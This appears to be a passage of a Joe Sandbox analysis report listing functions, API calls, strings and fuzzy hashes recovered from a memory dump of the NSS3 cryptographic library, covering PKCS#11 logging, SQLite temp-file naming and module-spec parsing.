Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f9729af56fd808d51013a7c62880715b7cba419c9d2f2411846c1edeea55c7f
Instruction ID: e79cab1be96054b9d411e3fc04eb36d59bc3cd0820cfeda0c6bae4f122609af2
Opcode Fuzzy Hash: 7f9729af56fd808d51013a7c62880715b7cba419c9d2f2411846c1edeea55c7f
Instruction Fuzzy Hash: 5AC04838248608CFC744DE09E4999A83BA8AB8AA10B0400A4EA428B722DA21F800CA81

Function 6C731D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6C731D46), ref: 6C732345

Strings

CKR_CURVE_NOT_SUPPORTED, xrefs: 6C732179
CKR_PIN_INVALID, xrefs: 6C732057
CKR_DEVICE_MEMORY, xrefs: 6C731FF3
CKR_SIGNATURE_LEN_RANGE, xrefs: 6C7320D9
CKR_OPERATION_ACTIVE, xrefs: 6C7322B8
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6C73227F
CKR_NEXT_OTP, xrefs: 6C73222F
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6C731F8B
CKR_INFORMATION_SENSITIVE, xrefs: 6C7322B1
CKR_STATE_UNSAVEABLE, xrefs: 6C732037
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6C731F0F
CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6C732319
CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6C73232E
CKR_FUNCTION_REJECTED, xrefs: 6C732289
rv = %s, xrefs: 6C732340
CKR_PIN_LOCKED, xrefs: 6C732075
CKR_SAVED_STATE_INVALID, xrefs: 6C731E56
CKR_MUTEX_NOT_LOCKED, xrefs: 6C732225
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6C73226B
CKR_NEW_PIN_MODE, xrefs: 6C731E9F
CKR_BUFFER_TOO_SMALL, xrefs: 6C732183
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6C731DE0
CKR_PIN_INCORRECT, xrefs: 6C731D92
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6C732275
CKR_DOMAIN_PARAMS_INVALID, xrefs: 6C732015
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6C732293, 6C73233F
CKR_PIN_EXPIRED, xrefs: 6C73206B
CKR_TEMPLATE_INCONSISTENT, xrefs: 6C731EE1
CKR_WRAPPED_KEY_INVALID, xrefs: 6C731FB5
CKR_PIN_LEN_RANGE, xrefs: 6C732061
CKR_OPERATION_CANCEL_FAILED, xrefs: 6C731F77
rv = 0x%x, xrefs: 6C732312
CKR_RANDOM_NO_RNG, xrefs: 6C7322A7
CKR_OK, xrefs: 6C731DFC
CKR_FUNCTION_NOT_PARALLEL, xrefs: 6C73218D
CKR_OBJECT_HANDLE_INVALID, xrefs: 6C73204D
CKR_FUNCTION_CANCELED, xrefs: 6C731E73
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6C732327
CKR_DEVICE_ERROR, xrefs: 6C73229D
CKR_MUTEX_BAD, xrefs: 6C731F49
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6C731FD7
CKR_DEVICE_REMOVED, xrefs: 6C732261
CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6C7322FF
CKR_TOKEN_NOT_PRESENT, xrefs: 6C731F81
CKR_TEMPLATE_INCOMPLETE, xrefs: 6C731F95
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6C732320
CKR_SIGNATURE_INVALID, xrefs: 6C7320CF

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print
String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: 2c70205694d0fb8287f33a46dda1639a4a00d3983633f6d33a2a73d2ca963089
Instruction ID: d50a36ba4a699c05d4cc1004e740b8d89991a10af9cbf3d31047de330408f04a
Opcode Fuzzy Hash: 2c70205694d0fb8287f33a46dda1639a4a00d3983633f6d33a2a73d2ca963089
Instruction Fuzzy Hash: 0261133068E178C7D63C444C876D36C22249753305FA8F97BE78E8EE93D666CA4946D3

Function 6C8109D0 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 275filetimethreadCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C810A22

Part of subcall function 6C7C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DC6
Part of subcall function 6C7C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DD1
Part of subcall function 6C7C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7C9DED

PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C810A35

Part of subcall function 6C6F3810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6F382A
Part of subcall function 6C6F3810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6F3879

PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C810A66
PR_GetCurrentThread.NSS3 ref: 6C810A70
PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C810A9D
PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C810AC8
PR_vsmprintf.NSS3(?,?), ref: 6C810AE8
EnterCriticalSection.KERNEL32(?), ref: 6C810B19
OutputDebugStringA.KERNEL32(00000000), ref: 6C810B48
OutputDebugStringA.KERNEL32(?), ref: 6C810B88
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C810C36
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810C45
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C810C5D
_PR_MD_UNLOCK.NSS3(?), ref: 6C810C76
PR_LogFlush.NSS3 ref: 6C810C7E
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C810C8D
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810C9C
OutputDebugStringA.KERNEL32(?), ref: 6C810CD1
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C810CEC
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810CFB
OutputDebugStringA.KERNEL32(00000000), ref: 6C810D16
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C810D26
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810D35
OutputDebugStringA.KERNEL32(0000000A), ref: 6C810D65
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C810D70
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810D7E
_PR_MD_UNLOCK.NSS3(?), ref: 6C810D90
free.MOZGLUE(00000000), ref: 6C810D99

Strings

%ld[%p]: , xrefs: 6C810A96
%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - , xrefs: 6C810A5B

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: DebugOutputStringfflush$Timefwrite$Unothrow_t@std@@@__ehfuncinfo$??2@$R_snprintfSystem$CriticalCurrentEnterExplodeFileFlushR_vsmprintfR_vsnprintfSectionThreadfputcfreememcpy
String ID: %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - $%ld[%p]:
API String ID: 3820836880-2800039365
Opcode ID: 028ea3d897d8389fc2e267776b6c849f740c11dc7b8d934d9d2a2472cad848a8
Instruction ID: 4f745d5a58a9971a0b9d4279a2c15c0dac955742f994381945c3e0b5fffd2f34
Opcode Fuzzy Hash: 028ea3d897d8389fc2e267776b6c849f740c11dc7b8d934d9d2a2472cad848a8
Instruction Fuzzy Hash: 53A10674A041559FDB309B29CC88BAA3BB8AF1631CF080A64F815D3B53D775AD94CB91

Function 6C7328A0 Relevance: 49.2, APIs: 12, Strings: 16, Instructions: 155COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetTokenInfo), ref: 6C7328BD
PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6C7328EF

Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(?), ref: 6C810B88
Part of subcall function 6C8109D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C810C5D
Part of subcall function 6C8109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C810C8D
Part of subcall function 6C8109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810C9C
Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(?), ref: 6C810CD1
Part of subcall function 6C8109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C810CEC
Part of subcall function 6C8109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810CFB
Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C810D16
Part of subcall function 6C8109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C810D26
Part of subcall function 6C8109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810D35
Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C810D65
Part of subcall function 6C8109D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C810D70
Part of subcall function 6C8109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C810D90
Part of subcall function 6C8109D0: free.MOZGLUE(00000000), ref: 6C810D99

Part of subcall function 6C6F0F00: PR_GetPageSize.NSS3(6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F1B
Part of subcall function 6C6F0F00: PR_NewLogModule.NSS3(clock,6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F25

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C7328D6

Part of subcall function 6C8109D0: PR_Now.NSS3 ref: 6C810A22
Part of subcall function 6C8109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C810A35
Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C810A66
Part of subcall function 6C8109D0: PR_GetCurrentThread.NSS3 ref: 6C810A70
Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C810A9D
Part of subcall function 6C8109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C810AC8
Part of subcall function 6C8109D0: PR_vsmprintf.NSS3(?,?), ref: 6C810AE8
Part of subcall function 6C8109D0: EnterCriticalSection.KERNEL32(?), ref: 6C810B19
Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C810B48
Part of subcall function 6C8109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C810C76
Part of subcall function 6C8109D0: PR_LogFlush.NSS3 ref: 6C810C7E

PR_LogPrint.NSS3( label = "%.32s",?), ref: 6C732963
PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 6C732983
PR_LogPrint.NSS3( model = "%.16s",?), ref: 6C7329A3
PR_LogPrint.NSS3( serial = "%.16s",?), ref: 6C7329C3
PR_LogPrint.NSS3( flags = %s %s %s %s,CKF_RNG,CKF_WRITE_PROTECTED,CKF_LOGIN_REQUIRED,?), ref: 6C732A26
PR_LogPrint.NSS3( maxSessions = %u, Sessions = %u,?,?), ref: 6C732A48
PR_LogPrint.NSS3( maxRwSessions = %u, RwSessions = %u,?,?), ref: 6C732A66
PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 6C732A8E
PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 6C732AB6

Strings

CKF_LOGIN_REQUIRED, xrefs: 6C7329F3, 6C732A1E
slotID = 0x%x, xrefs: 6C7328D1
model = "%.16s", xrefs: 6C73299E
maxRwSessions = %u, RwSessions = %u, xrefs: 6C732A61
CKF_USER_PIN_INIT, xrefs: 6C7329E5
CKF_WRITE_PROTECTED, xrefs: 6C7329FE, 6C732A1F
serial = "%.16s", xrefs: 6C7329BE
manufacturerID = "%.32s", xrefs: 6C73297E
C_GetTokenInfo, xrefs: 6C7328B8
hardware version: %d.%d, xrefs: 6C732A89
label = "%.32s", xrefs: 6C73295E
flags = %s %s %s %s, xrefs: 6C732A21
maxSessions = %u, Sessions = %u, xrefs: 6C732A43
CKF_RNG, xrefs: 6C732A13, 6C732A20
pInfo = 0x%p, xrefs: 6C7328EA
firmware version: %d.%d, xrefs: 6C732AB1

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushModulePageR_vsmprintfR_vsnprintfSectionSizeThreadTimefputcfreememcpy
String ID: firmware version: %d.%d$ flags = %s %s %s %s$ hardware version: %d.%d$ label = "%.32s"$ manufacturerID = "%.32s"$ maxRwSessions = %u, RwSessions = %u$ maxSessions = %u, Sessions = %u$ model = "%.16s"$ pInfo = 0x%p$ serial = "%.16s"$ slotID = 0x%x$CKF_LOGIN_REQUIRED$CKF_RNG$CKF_USER_PIN_INIT$CKF_WRITE_PROTECTED$C_GetTokenInfo
API String ID: 2460313690-1106672779
Opcode ID: 78f00f4b7725e16ac44d2dd6a2bd86b882c465cd4731d9d8a17cc7d9dbb03b7d
Instruction ID: a4bb46ac385bb2266e06db33096880798cf48bed58c5a427c1de8c60ddfb5c12
Opcode Fuzzy Hash: 78f00f4b7725e16ac44d2dd6a2bd86b882c465cd4731d9d8a17cc7d9dbb03b7d
Instruction Fuzzy Hash: 105126B0105155AFEB348B44DF8CA7537A9AB4220DF45A4B8EC089FB13DB35E808CBE1

Function 6C7D6E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C68CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6EF9C9,?,6C6EF4DA,6C6EF9C9,?,?,6C6B369A), ref: 6C68CA7A
Part of subcall function 6C68CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C68CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C69BE66), ref: 6C7D6E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C69BE66), ref: 6C7D6E98
sqlite3_snprintf.NSS3(?,00000000,6C83AAF9,?,?,?,?,?,?,6C69BE66), ref: 6C7D6EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C69BE66), ref: 6C7D6ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C69BE66), ref: 6C7D6EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D6F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D6F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D6F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C69BE66), ref: 6C7D6FA6
sqlite3_snprintf.NSS3(?,00000000,6C83AAF9,00000000,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D6FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D6FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D6FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D7014
sqlite3_free.NSS3(00000000,?,?,?,?,6C69BE66), ref: 6C7D701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C69BE66), ref: 6C7D7030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C69BE66), ref: 6C7D7079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D7097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D70A0

Strings

mz_etilqs_, xrefs: 6C7D6F18
winGetTempname5, xrefs: 6C7D7071
winGetTempname2, xrefs: 6C7D70C4
winGetTempname4, xrefs: 6C7D7046
winGetTempname1, xrefs: 6C7D708F

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: e958c3a7ac14dceb5ab8a6e993034df3ecb3b7a41aa458b69864209e36e23f46
Instruction ID: 81c9faa115301c565f1c2d6d4599c36057096a9c672c41604e91a7e08d580bf9
Opcode Fuzzy Hash: e958c3a7ac14dceb5ab8a6e993034df3ecb3b7a41aa458b69864209e36e23f46
Instruction Fuzzy Hash: 2D517BB1A0511227E31096349D59FBF36669F9330CF154A38E80696FC1FB25B50EC2E7

Function 6C764FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7175C2,00000000,00000000,00000001), ref: 6C765009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7175C2,00000000), ref: 6C765049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C76505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C765071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C765089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7650A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C7650B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7175C2), ref: 6C7650CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7650D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7650F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C765103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C76511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C76512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C765145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C765153
free.MOZGLUE(?), ref: 6C76516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C76517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C765195

Strings

nss=, xrefs: 6C765083
config=, xrefs: 6C76509B
parameters=, xrefs: 6C76506B
name=, xrefs: 6C765057
library=, xrefs: 6C765043

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: 39d9b90b73b798c89d8af8cd60e21a905314a655dd24b761c861e15e1f10e528
Instruction ID: 528918dff985075ac30360b31387b49fa58e6f215bbb46e823cbb333f095640f
Opcode Fuzzy Hash: 39d9b90b73b798c89d8af8cd60e21a905314a655dd24b761c861e15e1f10e528
Instruction Fuzzy Hash: 3151D7B5A011069BEB91CF21EE45A9A37A8AF0534CF140030EC55E7F42E725E919DBF2

Function 6C738E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C738E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C738EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C738EB3

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C738EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C738EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C738F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C738F29
PR_LogPrint.NSS3(?,00000000), ref: 6C738F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C738F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C738F80
PR_LogPrint.NSS3(?,00000000), ref: 6C738F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C738FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C738FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C739047

Strings

hWrappingKey = 0x%x, xrefs: 6C738F01, 6C738F11
hSession = 0x%x, xrefs: 6C738E8E, 6C738E9E
(CK_INVALID_HANDLE), xrefs: 6C738EAC, 6C738F1F, 6C738F79
pWrappedKey = 0x%p, xrefs: 6C738FAD
pMechanism = 0x%p, xrefs: 6C738EE0
*pulWrappedKeyLen = 0x%x, xrefs: 6C739042
hKey = 0x%x, xrefs: 6C738F5B, 6C738F6B
C_WrapKey, xrefs: 6C738E71
pulWrappedKeyLen = 0x%p, xrefs: 6C738FC8

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

